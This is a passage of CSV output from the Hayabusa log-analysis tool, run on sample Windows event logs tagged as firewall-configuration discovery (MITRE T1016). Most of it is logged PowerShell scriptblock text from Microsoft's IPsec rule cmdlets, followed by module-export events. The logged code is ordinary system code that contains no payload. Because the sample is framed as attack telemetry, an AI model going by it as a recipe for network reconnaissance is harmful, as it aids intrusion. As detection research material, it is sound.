[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parame",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBo",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"undParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
